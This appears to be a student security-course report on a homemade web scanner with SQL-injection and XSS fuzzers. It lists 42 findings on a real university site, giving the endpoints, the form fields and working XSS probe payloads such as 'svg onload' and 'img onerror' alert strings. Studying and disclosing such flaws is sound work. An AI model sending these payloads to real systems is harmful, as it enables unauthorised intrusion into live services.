# CS5439 Assignment 2 Report (Team 11) | Name | Lyu Siqing | Liu Jiahao | Jiang Yuancheng | Kang Anming | | --- | -------------------- | ------------------- | ------------------ | ------------------ | | StudentID | A0224929W | A0219076B | A0213812R | A0162494Y | | Email | siqing.lyu@u.nus.edu | jiahaoliu@u.nus.edu | e0509851@u.nus.edu | e0134081@u.nus.edu | ## Introduction Websites and web applications are just as prone to security breaches as physical homes, stores, and government infrastructures. There exist lots of vulnerabilities in some critical websites, such as the [Mysoc website](https://mysoc.nus.edu.sg/) of our department. In this project, we construct a web bugs scanner, which can be used to detect some typical vulnerabilities, such as SQL Injection and Cross-Site Scripting (XSS) Attack. At the end of this paper, we will evaluate our tool based on the experiment results on [Mysoc website](https://mysoc.nus.edu.sg/). ## WEBScanner ### Web Crawler #### Introduction and Mechanism Web Crawler is the basic of WEBScanner, this component acquires the URL we need for fuzzing from target website. This component is the foundation of the project. The basic mechanism of the crawler is shown below: ```mermaid graph LR url --> get_all_requests get_all_requests --> form_parser get_all_requests --> suburl_searcher form_parser --> new_requests suburl_searcher --> new_requests new_requests --> requests_list new_requests --> get_all_requests ``` To explain its mechanism better, one recursion period is as following: The input of crawler is a URL(and cookies if needed). - The crawler visits this given URL and collect information about all URL, forms and buttons. - The crawler stores collected things by categories, e.g. $GET\_ITEM$, $POST\_ITEM$. - The crawler visits one URL acquired in the first step and recursively runs until there are no new URLs to be stored. We designed a general Web Crawler which supports collecting URLs in different kinds of websites. Then, the fuzzers will be introduced to check whether the given website has vulnerabilities like SQL injection, XSS attack, and directory traversal. #### Implementation The input structure of Web Crawler is (url, cookies). First, it will send requests to the given URL to retrieve the page content and search for sub-URLs in the page. The crawler will acquire 3 types of URLs defined in w3c standards: \# type, / type and URLs with browser parameters, which is known as a URL with question mark in it. The output of the crawler is as followed: - $URL_1 = [url, http\ method, browser\ parameters]$ - $return\_list = [URL_1, URL_2, ......]$ ### SQL Fuzzer #### Introduction and Mechanism SQL fuzzer is one component of the WEBScanner, Its function is to test if the given URL, whether the related HTTP method is POST or GET, has a SQL injection vulnerability. After receiving a URL list as input, SQL fuzzer would try to do SQL attacks in different databases and various attacking techniques. We would detect a SQL injection by length comparison, error-based injection and time-based injection(if network is smooth). #### Implementation The fuzzer takes the output of Web Crawler as its input. For each input, the fuzzer will try to append SQL injection string into it parameters, by comparing the response, we can know if the website handled this illegal request correctly. Part of our designed behaviors list are as follows: **Normal behaviors** - Return with error code like 404, 403 - No matter what SQL injection we made, return blank page - No response (dropped our requests) - Return with page that filtered injected strings, e.g. given $a.com/?id=1\%27+and+1\%3d1+--+-$, returns $a.com/?id=1$ **Abnormal behavior** - Returned normally and applied injected SQL - Returned a database error, e.g. $MySQL\ Error\ 1264:\ out\ of\ range\ value\ for\ column$ ### XSS Fuzzer #### Introduction and Mechanism Same as SQL fuzzer, our XSS fuzzer is a component of the WEBScanner and will fuzz on the output of the Web Crawler. The XSS fuzzer will assign malicious values to each parameter, make HTTP requests and inspect the response. Aware of the various types of XSS attacks (i.e. stored XSS, reflected XSS and DOM-based XSS), our focus is stored and reflected XSS. In WEBScanner, the XSS fuzzer component works as an API that receives well-formatted and pre-processed data from the Web Crawler. Besides, we also implemented a standalone XSS fuzzer that can take more crude input. #### Implementation The fuzzer takes the output of Web Crawler as its input. Given a URL, a corresponding HTTP method (i.e. POST or GET), a set of URL parameters (represented as key-value pairs. In some context, they are referred to as "queries") and cookies, the fuzzer will replace the value of each parameter with code. After making HTTP requests with the modified parameters, the fuzzer inspects the responses to see if our malicious code is reflected (i.e. appears in the responses). The standalone XSS fuzzer will take a raw URL and cookies as input, then fuzz the URL parameters and the forms on the web page if there are any. ## Experiments and Analysis To evaluate WEBScanner, we use it to test [Mysoc Website](https://mysoc.nus.edu.sg/). With our test, we find lots of vulnerabilities of [Mysoc Website](https://mysoc.nus.edu.sg/). No.1 and No.2 belong to reflected XSS. No.3 ~ No. 39 are highly possible to be stored XSS. | INDEX | URL | GET(0)<br/>POST(1) | PAYLOAD | | ----- | -------------------------------------------------------- | -------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | 'https://mysoc.nus.edu.sg/~phdexam/student/index.php' | 0 | {'appn_id': '\<svg onload=alert(1)>'} | | 2 | 'https://mysoc.nus.edu.sg/app/phdexam/student/index.php' | 0 | {'appn_id': '\<svg onload=alert(1)>'} | | 3 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '\<svg onload=teste0509851test>', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 4 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '\<svg onload=teste0509851test>', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 5 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '\<svg onload=teste0509851test>', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 6 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '\<svg onload=teste0509851test>', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 7 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '\<svg onload=teste0509851test>', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 8 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '\<svg onload=teste0509851test>', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 9 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '\<svg onload=teste0509851test>', 'F_extension_f': 'Y', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 10 | 'https://mysoc.nus.edu.sg/app/eform/forms/form10.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_rs': '', 'F_hardwaremodel': '', 'F_asset': '', 'F_hostname': '', 'F_rackmount': 'NO', 'F_size': '', 'F_power': '', 'F_heat': '', 'F_handphone': '', 'F_extension_f': 'Y', 'F_supervisor_id': '\<svg onload=teste0509851test>', 'F_email': 'YES', 'submit': 'Continue'} | | 11 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '\<svg onload=teste0509851test>', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 12 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '\<svg onload=teste0509851test>', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 13 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '\<svg onload=teste0509851test>', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 14 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '\<svg onload=teste0509851test>', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 15 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '\<svg onload=teste0509851test>', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 16 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '\<svg onload=teste0509851test>', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 17 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '\<svg onload=teste0509851test>', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 18 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '\<svg onload=teste0509851test>', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 19 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '\<svg onload=teste0509851test>', 'F_supervisor_id': '', 'F_email': 'YES', 'submit': 'Continue'} | | 20 | 'https://mysoc.nus.edu.sg/app/eform/forms/form8.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': 'e0509851', 'F_can_apply': '1', 'F_rs': '', 'F_resource_others': '', 'F_mac_addr': '', 'F_host_ip': '', 'F_research_f': 'Research', 'F_research_t': '', 'F_teaching_f': 'Teaching', 'F_teaching_t': '', 'F_work_f': 'Work', 'F_work_t': '', 'F_misc_f': 'Misc', 'F_misc_t': '', 'F_extension_f': 'Y', 'F_rg_n': '', 'F_supervisor_id': '\<svg onload=teste0509851test>', 'F_email': 'YES', 'submit': 'Continue'} | | 21 | 'https://mysoc.nus.edu.sg/app/eform/forms/formC_1.php' | 1 | {'soc_id': '\<svg onload=teste0509851test>', 'F_per_type': 'ug', 'F_resource_c': 'L01', 'F_pi_id': '', 'Submit': 'Submit'} | | 22 | 'https://mysoc.nus.edu.sg/app/eform/forms/formC_1.php' | 1 | {'soc_id': 'e0509851', 'F_per_type': 'ug', 'F_resource_c': 'L01', 'F_pi_id': '\<svg onload=teste0509851test>', 'Submit': 'Submit'} | | 23 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '\<svg onload=teste0509851test>', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': 'e0509851', None: 'Go', 'F_start_d': '', 'F_end_d': '', 'F_pi_id': '', 'F_pc': '', 'Submit': 'Submit'} | | 24 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': '\<svg onload=teste0509851test>', None: 'Go', 'F_start_d': '', 'F_end_d': '', 'F_pi_id': '', 'F_pc': '', 'Submit': 'Submit'} | | 25 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': 'e0509851', None: 'Go', 'F_start_d': '\<svg onload=teste0509851test>', 'F_end_d': '', 'F_pi_id': '', 'F_pc': '', 'Submit': 'Submit'} | | 26 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': 'e0509851', None: 'Go', 'F_start_d': '', 'F_end_d': '\<svg onload=teste0509851test>', 'F_pi_id': '', 'F_pc': '', 'Submit': 'Submit'} | | 27 | 'https://mysoc.nus.edu.sg/app/eform/forms/formD_1.php' | 1 | {'logged_user': 'e0509851', 'F_per_type': 'student', 'F_curr_lab': '163', 'F_curr_seat': '10', 'F_curr_user': 'e0509851', 'F_curr_name': '', 'F_rq_f': 'Y', 'F_std_matric': 'A0213812R', 'F_resource_c': 'L02', 'soc_id': 'e0509851', None: 'Go', 'F_start_d': '', 'F_end_d': '', 'F_pi_id': '\<svg onload=teste0509851test>', 'F_pc': '', 'Submit': 'Submit'} | | 28 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '\<svg onload=teste0509851test>', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 29 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '\<svg onload=teste0509851test>', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 30 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '\<svg onload=teste0509851test>', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 31 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '\<svg onload=teste0509851test>', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 32 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '\<svg onload=teste0509851test>', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 33 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '\<svg onload=teste0509851test>', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 34 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '\<svg onload=teste0509851test>', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 35 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '\<svg onload=teste0509851test>', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 36 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '\<svg onload=teste0509851test>', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 37 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '\<svg onload=teste0509851test>', 'F_USER': 'e0509851', 'submit': 'Continue'} | | 38 | 'https://mysoc.nus.edu.sg/app/eform/forms/form1.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': '', 'F_qty': '\<svg onload=teste0509851test>', 'F_extension_f': 'Y', 'F_account_nm': ''} | | 39 | 'https://mysoc.nus.edu.sg/app/eform/forms/form1.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': '', 'F_qty': '', 'F_extension_f': 'Y', 'F_account_nm': '\<svg onload=teste0509851test\>'} | We have automatically found those 39 bugs above. With manual effort, we get two more bugs in **mysoc** website: No.40 is a sql injection bug. No.41 is a stored XSS bug. As these two bugs may bring a lot of trouble if misused, we are not going to disclose payloads in our report. No.42 is a reflected XSS bug. | INDEX | URL | GET(0)<br/>POST(1) | PAYLOAD | | ----- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------- | ---------- | | 40 | https://mysoc.nus.edu.sg/app/eform/forms/form6.php | 0 | undisclosed | | 41 | https://mysoc.nus.edu.sg/~calendar/start/PRIVATE/cal.cgi | 1 | undisclosed | | 42 | https://mysoc.nus.edu.sg/~calendar/getBooking.cgi | 0 | room=\<img src=x onerror=alert(1)\> | ## Related Work and Existing Tools Fuzz testing was developed at the University of Wisconsin Madison in 1989 by Professor Barton Miller and students. Their (continued) work an be found on [their website](http://www.cs.wisc.edu/~bart/fuzz/); it is mainly oriented towards command-line and UI fuzzing, and shows that modern operating systems are vulnerable to even simple fuzzing^1^. ### Commericial Fuzzing productions #### Acunetix Acunetix is a web vulnerability solution for securing websites, web applications, and APIs^5^. It can do penetration test under user control and analyze the total safety level of a website. Our project is a basic version open-sourced Acunetix without its performance analysis and template engine bug noticing functions. #### Burp Suite Burp Suite covers over 100 generic vulnerabvilities, having leading performance against OWASP vulnerabilities. As a mature product, it offers user-friendly GUI, provides different editions for various user groups (i.e. Enterprise, Professional and Community), and has been actively updated to keep up with the latest vulnerabilites and new complications^6^. ### Open-sourced Fuzzing frameworks #### BFuzz BFuzz is an input based fuzzer tool which opens up browser with a new instance and pass multiple generated test cases trying to crash the opened browser tab^3^. It is designed to find out potential DoS vulnerabilities. While XSS and SQL injection may cause DoS, the main threat brought by them are data breaches. #### Boofuzz Boofuzz is a fork of and the successor to the venerable Sulley fuzzing framework^2^. It is aimed to test server in transmission layer. In general, it will send various fuzzing input including malicious shellcode, oversized strings(to overflow targets' buffer) and other fuzzing data. Compared with our work, its target is different. #### XSStrike XSStrike is an advanced tool suite specialized for Cross Site Scripting detection. It integrates payload generator, crawler and fuzzing engine functions. Unlike most tools in this area, XSStrike does not simply inject a random payload and then check whether it works. Instead, it analyzes the response through multiple parsers, and then generates payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. It will also scan for DOM-based XSS vulnerabilities^4^. ## Summary and Future Work Compared to those commercial products, our WEBScanner is more light-weighted, probably faster, and suitable for preliminary screening to find obvious bugs. However, with smaller input dictionaries, lacking a mutation-based generator, targeting only a few common vulnerabilities and primitive exploitations, the WEBScanner is not that capable when facing a wider range of attacks and attacks with more complex and creative mechanisms. Another key point of this project is trying to find as many requests as possible. At this stage, we only use forms and sub-URLs to help us get new requests. However, there are some other ways to form new requests like JavaScript: ```htmlembedded= <a href="javascript: some code"> ``` We only focus on a subset of all requests. That's the root cause that we need some manual effort to get three extra bugs. ## Finding In addition, when we export the WEBScanner report with Typora, we find a bug of Typora on Windows. When we use this format statement: {'appn_id': '\<svg onload=alert(1)\>'} in the file directly. It will trigger an alert and this statement will be lost in the pdf. As Typora is a web-based software, it might be an XSS vulnerability. ## References [1]https://owasp.org/www-community/Fuzzing [2]https://github.com/jtpereyda/boofuzz [3]https://github.com/RootUp/BFuzz [4]https://github.com/s0md3v/XSStrike [5]https://www.acunetix.com/product/standard/ [6]https://portswigger.net/burp